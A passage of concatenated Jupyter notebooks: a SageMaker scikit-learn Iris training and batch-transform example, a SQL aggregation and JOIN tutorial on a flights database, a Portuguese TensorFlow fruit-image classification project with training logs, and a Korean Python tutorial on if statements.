'does not have permission to access the data.').format(args.train, "train")) raw_data = [ pd.read_csv(file, header=None, engine="python") for file in input_files ] train_data = pd.concat(raw_data) labels are in the first column train_y = train_data.iloc[:, 0] train_X = train_data.iloc[:, 1:] Here we support a single hyperparameter, 'max_leaf_nodes'. Note that you can add as many as your training my require in the ArgumentParser above. max_leaf_nodes = args.max_leaf_nodes Now use scikit-learn's decision tree classifier to train the model. clf = tree.DecisionTreeClassifier(max_leaf_nodes=max_leaf_nodes) clf = clf.fit(train_X, train_y) Print the coefficients of the trained classifier, and save the coefficients joblib.dump(clf, os.path.join(args.model_dir, "model.joblib"))def model_fn(model_dir): """Deserialized and return fitted model Note that this should have the same name as the serialized model in the main method """ clf = joblib.load(os.path.join(model_dir, "model.joblib")) return clf``` Because the Scikit-learn container imports your training script, you should always put your training code in a main guard `(if __name__=='__main__':)` so that the container does not inadvertently run your training code at the wrong point in execution.For more information about training environment variables, please visit https://github.com/aws/sagemaker-containers. Create SageMaker Scikit Estimator To run our Scikit-learn training script on SageMaker, we construct a `sagemaker.sklearn.estimator.sklearn` estimator, which accepts several constructor arguments:* __entry_point__: The path to the Python script SageMaker runs for training and prediction.* __role__: Role ARN* __train_instance_type__ *(optional)*: The type of SageMaker instances for training. __Note__: Because Scikit-learn does not natively support GPU training, Sagemaker Scikit-learn does not currently support training on GPU instance types.* __sagemaker_session__ *(optional)*: The session used to train on Sagemaker.* __hyperparameters__ *(optional)*: A dictionary passed to the train function as hyperparameters.To see the code for the SKLearn Estimator, see here: https://github.com/aws/sagemaker-python-sdk/tree/master/src/sagemaker/sklearn
###Code
from sagemaker.sklearn.estimator import SKLearn
FRAMEWORK_VERSION = "0.23-1"
script_path = 'scikit_learn_iris.py'
sklearn = SKLearn(
entry_point=script_path,
framework_version=FRAMEWORK_VERSION,
instance_type="ml.c4.xlarge",
role=role,
sagemaker_session=sagemaker_session,
hyperparameters={'max_leaf_nodes': 30})
###Output
_____no_output_____
###Markdown
Train SKLearn Estimator on Iris data Training is very simple, just call `fit` on the Estimator! This will start a SageMaker Training job that will download the data for us, invoke our scikit-learn code (in the provided script file), and save any model artifacts that the script creates.
###Code
sklearn.fit({'train': train_input})
###Output
_____no_output_____
###Markdown
Using the trained model to make inference requests Deploy the model Deploying the model to SageMaker hosting just requires a `deploy` call on the fitted model. This call takes an instance count and instance type.
###Code
predictor = sklearn.deploy(initial_instance_count=1, instance_type="ml.m5.xlarge")
###Output
_____no_output_____
###Markdown
Choose some data and use it for a prediction In order to do some predictions, we'll extract some of the data we used for training and do predictions against it. This is, of course, bad statistical practice, but a good way to see how the mechanism works.
###Code
import itertools
import pandas as pd
shape = pd.read_csv("data/iris.csv", header=None)
a = [50*i for i in range(3)]
b = [40+i for i in range(10)]
indices = [i+j for i,j in itertools.product(a,b)]
test_data = shape.iloc[indices[:-1]]
test_X = test_data.iloc[:,1:]
test_y = test_data.iloc[:,0]
###Output
_____no_output_____
###Markdown
Prediction is as easy as calling predict with the predictor we got back from deploy and the data we want to do predictions with. The output from the endpoint return an numerical representation of the classification prediction; in the original dataset, these are flower names, but in this example the labels are numerical. We can compare against the original label that we parsed.
###Code
print(predictor.predict(test_X.values))
print(test_y.values)
###Output
_____no_output_____
###Markdown
Endpoint cleanup When you're done with the endpoint, you'll want to clean it up.
###Code
predictor.delete_endpoint()
###Output
_____no_output_____
###Markdown
Batch Transform We can also use the trained model for asynchronous batch inference on S3 data using SageMaker Batch Transform.
###Code
# Define a SKLearn Transformer from the trained SKLearn Estimator
transformer = sklearn.transformer(instance_count=1, instance_type='ml.m5.xlarge')
###Output
_____no_output_____
###Markdown
Prepare Input Data We will extract 10 random samples of 100 rows from the training data, then split the features (X) from the labels (Y). Then upload the input data to a given location in S3.
###Code
%%bash
# Randomly sample the iris dataset 10 times, then split X and Y
mkdir -p batch_data/XY batch_data/X batch_data/Y
for i in {0..9}; do
cat data/iris.csv | shuf -n 100 > batch_data/XY/iris_sample_${i}.csv
cat batch_data/XY/iris_sample_${i}.csv | cut -d',' -f2- > batch_data/X/iris_sample_X_${i}.csv
cat batch_data/XY/iris_sample_${i}.csv | cut -d',' -f1 > batch_data/Y/iris_sample_Y_${i}.csv
done
# Upload input data from local filesystem to S3
batch_input_s3 = sagemaker_session.upload_data('batch_data/X', key_prefix=prefix + '/batch_input')
###Output
_____no_output_____
###Markdown
Run Transform Job Using the Transformer, run a transform job on the S3 input data.
###Code
# Start a transform job and wait for it to finish
transformer.transform(batch_input_s3, content_type='text/csv')
print('Waiting for transform job: ' + transformer.latest_transform_job.job_name)
transformer.wait()
###Output
_____no_output_____
###Markdown
Check Output Data After the transform job has completed, download the output data from S3. For each file "f" in the input data, we have a corresponding file "f.out" containing the predicted labels from each input row. We can compare the predicted labels to the true labels saved earlier.
###Code
# Download the output data from S3 to local filesystem
batch_output = transformer.output_path
!mkdir -p batch_data/output
!aws s3 cp --recursive $batch_output/ batch_data/output/
# Head to see what the batch output looks like
!head batch_data/output/*
%%bash
# For each sample file, compare the predicted labels from batch output to the true labels
for i in {1..9}; do
diff -s batch_data/Y/iris_sample_Y_${i}.csv \
<(cat batch_data/output/iris_sample_X_${i}.csv.out | sed 's/[["]//g' | sed 's/, \|]/\n/g') \
| sed "s/\/dev\/fd\/63/batch_data\/output\/iris_sample_X_${i}.csv.out/"
done
###Output
_____no_output_____ |
Week_4_SQL_Queries/SQL Aggregation and Join.ipynb | ###Markdown
SQL Aggregation and Join
###Code
import pandas as pd
import sqlite3
conn = sqlite3.connect("data/flights.db")
cur = conn.cursor()
###Output
_____no_output_____
###Markdown
Objectives - Use SQL aggregation functions with GROUP BY- Use HAVING for group filtering- Use SQL JOIN to combine tables using keys Aggregating Functions > A SQL **aggregating function** takes in many values and returns one value. We have already seen some SQL aggregating functions like `COUNT()`. There are also others, like SUM(), AVG(), MIN(), and MAX(). Example Simple Aggregations
###Code
# Max value for longitude
pd.read_sql('''
SELECT
-- Note we have to cast to a numerical value first
MAX(CAST(longitude AS REAL))
FROM airports
''', conn)
# Max value for id in table
pd.read_sql('''
SELECT
MAX(CAST(id AS integer))
FROM
airports
''', conn)
# Effectively counts all the inactive airlines
pd.read_sql('''
SELECT COUNT()
FROM airlines
WHERE active='N'
''', conn)
###Output
_____no_output_____
###Markdown
We can also give aliases to our aggregations:
###Code
# Effectively counts all the active airlines
pd.read_sql('''
SELECT
COUNT() AS number_of_active_airlines
FROM
airlines
WHERE
active='Y'
''', conn)
###Output
_____no_output_____
###Markdown
Grouping in SQL We can go deeper and use aggregation functions on _groups_ using the `GROUP BY` clause. The `GROUP BY` clause will group one or more columns together with the same values as one group to perform aggregation functions on. Example `GROUP BY` Statements Let's say we want to know how many active and non-active airlines there are. Without `GROUP BY` Let's first start with just seeing how many airlines there are:
###Code
df_results = pd.read_sql('''
SELECT
-- Reminder that this counts the number of rows before the SELECT
COUNT() AS number_of_airlines
FROM
airlines
''', conn)
df_results
###Output
_____no_output_____
###Markdown
One way for us to get the counts for each is to create two queries that will filter each kind of airline (active vs non-active) and count those values:
###Code
df_active = pd.read_sql('''
SELECT
COUNT() AS number_of_active_airlines
FROM
airlines
WHERE
active='Y'
''', conn)
df_not_active = pd.read_sql('''
SELECT
COUNT() AS number_of_not_active_airlines
FROM
airlines
WHERE
active='N'
''', conn)
display(df_active)
display(df_not_active)
###Output
_____no_output_____
###Markdown
This works but it's inefficient. With `GROUP BY` Instead, we can tell the SQL server to do the work for us by grouping values we care about for us!
###Code
df_results = pd.read_sql('''
SELECT
COUNT() AS number_of_airlines
FROM
airlines
GROUP BY
active
''', conn)
df_results
###Output
_____no_output_____
###Markdown
This is great! And if you look closely, you can observe we have _three_ different groups instead of our expected two! Let's also print out the `airlines.active` value for each group/aggregation so we know what we're looking at:
###Code
df_results = pd.read_sql('''
SELECT
airlines.active,
COUNT() AS number_of_airlines
FROM
airlines
GROUP BY
airlines.active
''', conn)
df_results
###Output
_____no_output_____
###Markdown
Group Task - Which countries have the highest numbers of active airlines? Return the top 10.
###Code
pd.read_sql('''
SELECT
*
FROM
airlines
''', conn)
###Output
_____no_output_____
###Markdown
Possible Solution``` sql pd.read_sql(''' SELECT COUNT() AS num, country FROM airlines WHERE active='Y' GROUP BY country ORDER BY num DESC LIMIT 10 ''', conn)``` > Note that the `GROUP BY` clause is considered _before_ the `ORDER BY` and `LIMIT` clauses Exercise: Grouping - Run a query that will return the number of airports by time zone. Each row should have a number of airports and a time zone.
###Code
# Your code here
###Output
_____no_output_____
###Markdown
Possible Solution``` sqlpd.read_sql(''' SELECT airports.timezone ,COUNT() AS num_of_airports FROM airports GROUP BY airports.timezone ORDER BY num_of_airports DESC''', conn) ``` Filtering Groups with `HAVING` We showed that you can filter tables with `WHERE`. We can similarly filter _groups/aggregations_ using `HAVING` clauses. Examples of Using `HAVING` Simple Filtering - Number of Airports in a Country Let's come back to the aggregation of active airports:
###Code
pd.read_sql('''
SELECT
COUNT() AS num,
country
FROM
airlines
WHERE
active='Y'
GROUP BY
country
ORDER BY
num DESC
''', conn)
###Output
_____no_output_____
###Markdown
We can see we have a lot of results. But maybe we only want to keep the countries that have more than $30$ active airlines:
###Code
pd.read_sql('''
SELECT
country,
COUNT() AS num
FROM
airlines
WHERE
active='Y'
GROUP BY
country
HAVING
num > 30
ORDER BY
num DESC
''', conn)
###Output
_____no_output_____
###Markdown
Filtering Different Aggregations - Airport Altitudes We can also filter on other aggregations. For example, let's say we want to investigate the `airports` table. Specifically, we want to know the height of the _highest airport_ in a country given that it has _at least $100$ airports_. Looking at the `airports` Table
###Code
df_airports = pd.read_sql('''
SELECT
*
FROM
airports
''', conn)
df_airports.head()
###Output
_____no_output_____
###Markdown
Looking at the Highest Airport Let's first get the highest altitude for each airport:
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
FROM
airports
GROUP BY
airports.country
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Looking at the Number of Airports Too We can also get the number of airports for each country.
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
,COUNT() AS number_of_airports_in_country
FROM
airports
GROUP BY
airports.country
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Filtering on Aggregations > Recall:>> We want to know the height of the _highest airport_ in a country given that it has _at least $100$ airports_.
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
-- Note we don't have to include this in our SELECT
,COUNT() AS number_of_airports_in_country
FROM
airports
GROUP BY
airports.country
HAVING
COUNT() >= 100
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Joins The biggest advantage in using a relational database (like we've been with SQL) is that you can create **joins**. > By using **`JOIN`** in our query, we can connect different tables using their _relationships_ to other tables.>> Usually we use a key (*foreign key*) to tell us how the two tables are related. There are different types of joins and each has their different use case. `INNER JOIN` > An **inner join** will join two tables together and only keep rows if the _key is in both tables_  Example of an inner join:``` sqlSELECT table1.column_name, table2.different_column_nameFROM table1 INNER JOIN table2 ON table1.shared_column_name = table2.shared_column_name``` Code Example for Inner Joins Let's say we want to look at the different airplane routes
###Code
pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
###Output
_____no_output_____
###Markdown
This is great but notice the `airline_id` column. It'd be nice to have some more information about the airlines associated with these routes. We can do an **inner join** to get this information! Inner Join Routes & Airline Data
###Code
pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
###Output
_____no_output_____
###Markdown
We can also specify that we want to retain only certain columns in the `SELECT` clause:
###Code
pd.read_sql('''
SELECT
routes.source AS departing
,routes.dest AS destination
,routes.stops AS stops_before_destination
,airlines.name AS airline
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
###Output
_____no_output_____
###Markdown
Note: Losing Data with Inner Joins Since data rows are kept only if _both_ tables have the key, some data can be lost
###Code
df_all_routes = pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
df_routes_after_join = pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
# Look at how the number of rows are different
df_all_routes.shape, df_routes_after_join.shape
###Output
_____no_output_____
###Markdown
If you want to keep your data from at least one of your tables, you should use a left join instead of an inner join. `LEFT JOIN` > A **left join** will join two tables together and but will keep all data from the first (left) table using the key provided.  Example of a left and right join:```sqlSELECT table1.column_name, table2.different_column_nameFROM table1 LEFT JOIN table2 ON table1.shared_column_name = table2.shared_column_name``` Code Example for Left Join Recall our example using an inner join and how it lost some data since the key wasn't in both the `routes` _and_ `airlines` tables.
###Code
df_all_routes = pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
# This will lose some data (some routes not included)
df_routes_after_inner_join = pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
# The number of rows are different
df_all_routes.shape, df_routes_after_inner_join.shape
###Output
_____no_output_____
###Markdown
If wanted to ensure we always had every route even if the key in `airlines` was not found, we could replace our `INNER JOIN` with a `LEFT JOIN`:
###Code
# This will include all the data from routes
df_routes_after_left_join = pd.read_sql('''
SELECT
*
FROM
routes
LEFT JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
df_routes_after_left_join.shape
###Output
_____no_output_____
###Markdown
Exercise: Joins Which airline has the most routes listed in our database?
###Code
# Your code here
###Output
_____no_output_____ |
Data Science Academy/PythonFundamentos/Cap12/DSA-Python-Cap12-Mini-Projeto4.ipynb | ###Markdown
Data Science Academy - Python Fundamentos - Capítulo 12 Download: http://github.com/dsacademybr Mini-Projeto 4 - Inteligência Artificial na Agricultura **ATENÇÃO**Este Mini-Projeto é um bônus com nível intermediário/avançado e o que apresentaremos aqui é apenas uma demonstração. Os conceitos necessários para executar este Mini-Projeto são estudados em detalhes na Formação Inteligência Artificial e Formação Inteligência Artificial Aplicada à Medicina aqui na DSA.  Definição do ProblemaAcesse o manual em pdf no Capítulo 12 do curso. Fonte de DadosAcesse o manual em pdf no Capítulo 12 do curso. Instalando e Carregando Pacotes
###Code
# Versão da Linguagem Python
from platform import python_version
print('Versão da Linguagem Python Usada Neste Jupyter Notebook:', python_version())
# Instala o TensorFlow
#!pip install -q tensorflow==2.5
# Imports
import sklearn
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from pathlib import Path
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers.experimental.preprocessing import RandomFlip
from tensorflow.keras.layers.experimental.preprocessing import RandomRotation
from tensorflow.keras.layers.experimental.preprocessing import RandomZoom
from tensorflow.keras.applications import EfficientNetB3
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.metrics import Precision
from tensorflow.keras.metrics import Recall
# Seed para reprodutibilidade
tf.random.set_seed(4)
###Output
_____no_output_____
###Markdown
Carregando os Dados (Imagens)
###Code
# Diretório atual
diretorio_atual = Path.cwd()
print(diretorio_atual)
# Caminho para os dados de treino
caminho_dados_treino = Path("fruits-360/Training")
# Caminho para os dados de teste
caminho_dados_teste = Path("fruits-360/Test")
# Listando o conteúdo da pasta
imagens_treino = list(caminho_dados_treino.glob("*/*"))
# Visualiza uma amostra da lista
imagens_treino[925:936]
# Expressão lambda que extrai apenas o valor com o caminho de cada imagem
imagens_treino = list(map(lambda x: str(x), imagens_treino))
# Visualiza uma amostra da lista
imagens_treino[925:936]
# Total de imagens de treino
len(imagens_treino)
###Output
_____no_output_____
###Markdown
Pré-Processamento dos Dados
###Code
# Função que obtém o label de cada imagem
def extrai_label(caminho_imagem):
return caminho_imagem.split("/")[-2]
# Aplica a função
imagens_treino_labels = list(map(lambda x: extrai_label(x), imagens_treino))
# Visualiza uma amostra
imagens_treino_labels[840:846]
###Output
_____no_output_____
###Markdown
> Label encoding (convertendo string para valor numérico)
###Code
# Cria o objeto
encoder = LabelEncoder()
# Aplica o fit_transform
imagens_treino_labels = encoder.fit_transform(imagens_treino_labels)
# Visualiza uma amostra
imagens_treino_labels[840:846]
# Aplicamos One-Hot-Encoding nos labels
imagens_treino_labels = tf.keras.utils.to_categorical(imagens_treino_labels)
# Visualiza uma amostra
imagens_treino_labels[840:846]
# Dividimos os dados de treino em duas amostras, treino e validação
X_treino, X_valid, y_treino, y_valid = train_test_split(imagens_treino, imagens_treino_labels)
X_treino[15:18]
y_treino[15:18]
###Output
_____no_output_____
###Markdown
Dataset Augmentation
###Code
# Redimensionamento de todas as imagens para 224 x 224
img_size = 224
resize = tf.keras.Sequential([tf.keras.layers.experimental.preprocessing.Resizing(img_size, img_size)])
# Cria o objeto para dataset augmentation
data_augmentation = tf.keras.Sequential([RandomFlip("horizontal"),
RandomRotation(0.2),
RandomZoom(height_factor = (-0.3,-0.2)) ])
###Output
_____no_output_____
###Markdown
Preparando os Dados
###Code
# Hiperparâmnetros
batch_size = 32
autotune = tf.data.experimental.AUTOTUNE
# Função para carregar e transformar as imagens
def carrega_transforma(image, label):
image = tf.io.read_file(image)
image = tf.io.decode_jpeg(image, channels = 3)
return image, label
# Função para preparar os dados noo formato do TensorFlow
def prepara_dataset(path, labels, train = True):
# Prepara os dados
image_paths = tf.convert_to_tensor(path)
labels = tf.convert_to_tensor(labels)
image_dataset = tf.data.Dataset.from_tensor_slices(image_paths)
label_dataset = tf.data.Dataset.from_tensor_slices(labels)
dataset = tf.data.Dataset.zip((image_dataset, label_dataset))
dataset = dataset.map(lambda image, label: carrega_transforma(image, label))
dataset = dataset.map(lambda image, label: (resize(image), label), num_parallel_calls = autotune)
dataset = dataset.shuffle(1000)
dataset = dataset.batch(batch_size)
# Se train = True aplica dataset augmentation
if train:
dataset = dataset.map(lambda image, label: (data_augmentation(image), label), num_parallel_calls = autotune)
# Se train = False repete sobre o dataset e retorna
dataset = dataset.repeat()
return dataset
# Cria o dataset de treino
dataset_treino = prepara_dataset(X_treino, y_treino)
# Shape
imagem, label = next(iter(dataset_treino))
print(imagem.shape)
print(label.shape)
# Vamos visualizar uma imagem e um label
print(encoder.inverse_transform(np.argmax(label, axis = 1))[0])
plt.imshow((imagem[0].numpy()/255).reshape(224,224,3))
# Cria o dataset de validação
dataset_valid = prepara_dataset(X_valid, y_valid, train = False)
# Shape
imagem, label = next(iter(dataset_valid))
print(imagem.shape)
print(label.shape)
###Output
(32, 224, 224, 3)
(32, 131)
###Markdown
Construção do Modelo
###Code
# Carregando um modelo pré-treinado
modelo_pre = EfficientNetB3(input_shape = (224,224,3), include_top = False)
# Adicionando nossas próprias camadas ao modelo_pre
modelo = tf.keras.Sequential([modelo_pre,
tf.keras.layers.GlobalAveragePooling2D(),
tf.keras.layers.Dense(131, activation = 'softmax')])
# Sumário do modelo
modelo.summary()
# Hiperparâmetros
lr = 0.001
beta1 = 0.9
beta2 = 0.999
ep = 1e-07
# Compilação do modelo
modelo.compile(optimizer = Adam(learning_rate = lr,
beta_1 = beta1,
beta_2 = beta2,
epsilon = ep),
loss = 'categorical_crossentropy',
metrics = ['accuracy', Precision(name = 'precision'), Recall(name = 'recall')])
###Output
_____no_output_____
###Markdown
> Vamos treinar o modelo por apenas uma época e verificar as métricas. **Nota**: Se você treinar o modelo em um computador sem GPU o tempo de treinamento será bastante alto, provavelmente de muitas horas. Pratique a paciência e aguarde.
###Code
%%time
history = modelo.fit(dataset_treino,
steps_per_epoch = len(X_treino)//batch_size,
epochs = 1,
validation_data = dataset_valid,
validation_steps = len(y_treino)//batch_size)
###Output
1586/1586 [==============================] - 567s 358ms/step - loss: 0.2437 - accuracy: 0.9369 - precision: 0.9676 - recall: 0.9173 - val_loss: 2.8520 - val_accuracy: 0.5486 - val_precision: 0.5955 - val_recall: 0.5219
CPU times: user 22min 39s, sys: 1min 46s, total: 24min 26s
Wall time: 9min 39s
###Markdown
> Vamos treinar o modelo por mais 6 épocas a fim de melhorar a performance e aplicar algumas técnicas para evitar overfitting.
###Code
# Não precisamos mais do modelo_pre
modelo.layers[0].trainable = False
# Checkpoint
checkpoint = tf.keras.callbacks.ModelCheckpoint("modelo/melhor_modelo.h5",
verbose = 1,
save_best = True,
save_weights_only = True)
# Early stop
early_stop = tf.keras.callbacks.EarlyStopping(patience = 4)
# Sumário
modelo.summary()
%%time
history = modelo.fit(dataset_treino,
steps_per_epoch = len(X_treino)//batch_size,
epochs = 6,
validation_data = dataset_valid,
validation_steps = len(y_treino)//batch_size,
callbacks = [checkpoint, early_stop])
###Output
Epoch 1/6
2/1586 [..............................] - ETA: 3:49 - loss: 0.0466 - accuracy: 0.9844 - precision: 0.9844 - recall: 0.9844WARNING:tensorflow:Callbacks method `on_train_batch_end` is slow compared to the batch time (batch time: 0.1046s vs `on_train_batch_end` time: 0.1825s). Check your callbacks.
1586/1586 [==============================] - ETA: 0s - loss: 0.0602 - accuracy: 0.9839 - precision: 0.9858 - recall: 0.9819
Epoch 00001: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 566s 357ms/step - loss: 0.0602 - accuracy: 0.9839 - precision: 0.9858 - recall: 0.9819 - val_loss: 1.9028 - val_accuracy: 0.6720 - val_precision: 0.6956 - val_recall: 0.6538
Epoch 2/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0447 - accuracy: 0.9873 - precision: 0.9887 - recall: 0.9861
Epoch 00002: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 575s 363ms/step - loss: 0.0447 - accuracy: 0.9873 - precision: 0.9887 - recall: 0.9861 - val_loss: 1.1099 - val_accuracy: 0.6940 - val_precision: 0.7524 - val_recall: 0.6507
Epoch 3/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0338 - accuracy: 0.9902 - precision: 0.9914 - recall: 0.9896
Epoch 00003: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 574s 362ms/step - loss: 0.0338 - accuracy: 0.9902 - precision: 0.9914 - recall: 0.9896 - val_loss: 0.6123 - val_accuracy: 0.8433 - val_precision: 0.8653 - val_recall: 0.8270
Epoch 4/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0348 - accuracy: 0.9903 - precision: 0.9911 - recall: 0.9895
Epoch 00004: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 571s 360ms/step - loss: 0.0348 - accuracy: 0.9903 - precision: 0.9911 - recall: 0.9895 - val_loss: 0.9220 - val_accuracy: 0.8092 - val_precision: 0.8311 - val_recall: 0.7916
Epoch 5/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0210 - accuracy: 0.9940 - precision: 0.9943 - recall: 0.9937
Epoch 00005: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 578s 365ms/step - loss: 0.0210 - accuracy: 0.9940 - precision: 0.9943 - recall: 0.9937 - val_loss: 0.6389 - val_accuracy: 0.8625 - val_precision: 0.8739 - val_recall: 0.8543
Epoch 6/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0274 - accuracy: 0.9924 - precision: 0.9930 - recall: 0.9920
Epoch 00006: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 576s 363ms/step - loss: 0.0274 - accuracy: 0.9924 - precision: 0.9930 - recall: 0.9920 - val_loss: 0.7594 - val_accuracy: 0.8290 - val_precision: 0.8488 - val_recall: 0.8158
CPU times: user 2h 14min 51s, sys: 10min 28s, total: 2h 25min 20s
Wall time: 57min 22s
###Markdown
Avaliação do Modelo
###Code
# Para carregar os pesos, precisamos descongelar as camadas
modelo.layers[0].trainable = True
# Carrega os pesos do ponto de verificação e reavalie
modelo.load_weights("modelo/melhor_modelo.h5")
###Output
_____no_output_____
###Markdown
> Carregamos os dados de teste.
###Code
# Carregando e preparando os dados de teste
camninho_imagens_teste = list(caminho_dados_teste.glob("*/*"))
imagens_teste = list(map(lambda x: str(x), camninho_imagens_teste))
imagens_teste_labels = list(map(lambda x: extrai_label(x), imagens_teste))
imagens_teste_labels = encoder.fit_transform(imagens_teste_labels)
imagens_teste_labels = tf.keras.utils.to_categorical(imagens_teste_labels)
test_image_paths = tf.convert_to_tensor(imagens_teste)
test_image_labels = tf.convert_to_tensor(imagens_teste_labels)
# Função para decode das imagens
def decode_imagens(image, label):
image = tf.io.read_file(image)
image = tf.io.decode_jpeg(image, channels = 3)
image = tf.image.resize(image, [224,224], method = "bilinear")
return image, label
# Cria o dataset de teste
dataset_teste = (tf.data.Dataset
.from_tensor_slices((imagens_teste, imagens_teste_labels))
.map(decode_imagens)
.batch(batch_size))
# Shape
imagem, label = next(iter(dataset_teste))
print(imagem.shape)
print(label.shape)
# Visualiza uma imagem de teste
print(encoder.inverse_transform(np.argmax(label, axis = 1))[0])
plt.imshow((imagem[0].numpy()/255).reshape(224,224,3))
# Avalia o modelo
loss, acc, prec, rec = modelo.evaluate(dataset_teste)
print("Acurácia: ", acc)
print("Precision: ", prec)
print("Recall: ", rec)
###Output
Acurácia: 0.7615920305252075
Precision: 0.7857208847999573
Recall: 0.7499118447303772
###Markdown
Previsões com o Modelo Treinado
###Code
# Função para carregar uma nova imagem
def carrega_nova_imagem(image_path):
image = tf.io.read_file(image_path)
image = tf.io.decode_jpeg(image, channels = 3)
image = tf.image.resize(image, [224,224], method = "bilinear")
plt.imshow(image.numpy()/255)
image = tf.expand_dims(image, 0)
return image
# Função para fazer previsões
def faz_previsao(image_path, model, enc):
image = carrega_nova_imagem(image_path)
prediction = model.predict(image)
pred = np.argmax(prediction, axis = 1)
return enc.inverse_transform(pred)[0]
# Previsão
faz_previsao("imagens/imagem1.jpg", modelo, encoder)
# Previsão
faz_previsao("imagens/imagem2.jpg", modelo, encoder)
# Previsão
faz_previsao("imagens/imagem3.jpg", modelo, encoder)
# Previsão
faz_previsao("imagens/imagem4.jpg", modelo, encoder)
# Previsão
faz_previsao("imagens/imagem5.jpg", modelo, encoder)
###Output
_____no_output_____ |
III_01.ipynb | ###Markdown
__III. 프로그램의 구조를 쌓는다! 제어문__--- __1. if문__* __'돈이 있으면 택시를 타고, 돈이 없으면 걸어간다.'__* 프로그래밍도 사람이 하는 것이므로 위의 문장처럼 주어진 조건을 판단한 후 그 상황에 맞게 처리해야 할 경우가 생긴다* 즉, 프로그래밍에서 조건을 판단하여 해당 조건에 맞는 상황을 수행하는 데 쓰이는 것이 바로 if문이다
###Code
'''위와 같은 상황을 파이썬에서는 다음과 같이 표현할 수 있다.'''
money = 1
if money :
print('택시를 타고 가라')
else :
print('걸어가라')
###Output
택시를 타고 가라
###Markdown
* 아래 그림은 '택시를 타고 가라'는 문장이 출력되는 과정을 보여준다 __1) if문의 기본구조__ if 조건문:수행할 문장1수행할 문장2else:수행할 문장A수행할 문장B * 조건문을 테스트해서 참이면 __if__문을 바로 다음의 문장(if 블록)들을 수행하고, 조건문이 거짓이면 __else__문이 다음의 문장(else 블록)들을 수행하게 된다* 그러므로 __else__문은 __if__문 없이 독립적으로 사용할 수 없다 __가. 들여쓰기__* __if__문을 만들 때는 ```pythonif 조건문 : 바로 아래 문장부터 if문에 속하는 모든 문장에 들여쓰기(indentation)를 해주어야 한다```
###Code
money = 1
if money :
print('택시를')
print('타고')
print('가자')
###Output
택시를
타고
가자
###Markdown
* 이렇게 작성하면 오류가 발생한다```pythonif 조건문 : 수행할문장1수행할문장2 수행할문장3``````pythonif 조건문 : 수행할문장1 수행할문장2 수행할문장3```* 실제로 해보자
###Code
money = 1
if money :
print('택시를')
print('타고')
print('가자')
money = 1
if money :
print('택시를')
print('타고')
print('가자')
###Output
_____no_output_____
###Markdown
* 그렇다면 들여쓰기는 __공백[SpaceBar]__으로 하는것이 좋을까? 아니면 __탭[Tab]__으로 하는 것이 좋을까?* 이에 대한 논란은 아직도 계속되고 있다* 두개의 의견 모두가 동의하는 내용은 단하나, 2가지를 혼용해서 쓰지 말자는 것이다* 요즘 파이썬 커뮤니티에서는 들여쓰기를 할 때 __공백[SpaceBar]__ 4개를 사용하는 것을 권장 한다 __2) 조건문이란 무엇인가?__* if조건문에서 '조건문'이란 참과 거짓을 판단하는 문장을 말한다* 자료형의 참과 거짓에 대해서 몇 가지만 다시 살펴보면 다음과 같은 것들이 있다 | 자료형 | 참 | 거짓 || :-: | :-: | :-: || __숫자__ | 0이 아닌 숫자 | 0 || __문자열__ | 'abc' | "" || __리스트__ | [1, 2, 3] | [] || __튜플__ | (1, 2, 3) | () || __딕셔너리__ | {'a' : 'b'} | {} | * 따라서 이전에 살펴보았던 택시 예제에서 조건문은 money가 된다```pythonmoney = 1if money :```* money는 1이기 때문에 참이 되어 __if__문 다음의 문장을 수행하게 된다 __가. 비교연산자__* 조건이 참인지 거짓인지 판단할 때 자료형보다는 비교연산자를 쓰는 경우가 훨씬 많다 | 비교연산자 | 설명 || :-: | :-: || __$ x < y $__ | $ x $가 $ y $ 보다 작다 || __$ x > y $__ | $ x $가 $ y $ 보다 크다 || __$ x == y $__ | $ x $와 $ y $ 가 같다|| __$ x != y $__ | $ x $와 $ y $ 가 같지 않다 || __$ x >= y $__ | $ x $가 $ y $ 보다 크거나 같다 || __$ x <= y $__ | $ x $가 $ y $ 보다 작거나 같다 |
###Code
x = 3
y = 2
print(x > y)
print(x < y)
print(x == y)
print(x != y)
'''만약 3000원 이상의 돈을 가지고 있으면 택시를 타고 그렇지 않으면 걸어 가라'''
money = 2000
if money >= 3000 :
print('택시를 타고 가라')
else :
print('걸어가라')
# money >= 3000이라는 조건문이 거짓이 되기 때문에 else문 다음 문장을 수행하게 된다
###Output
걸어가라
###Markdown
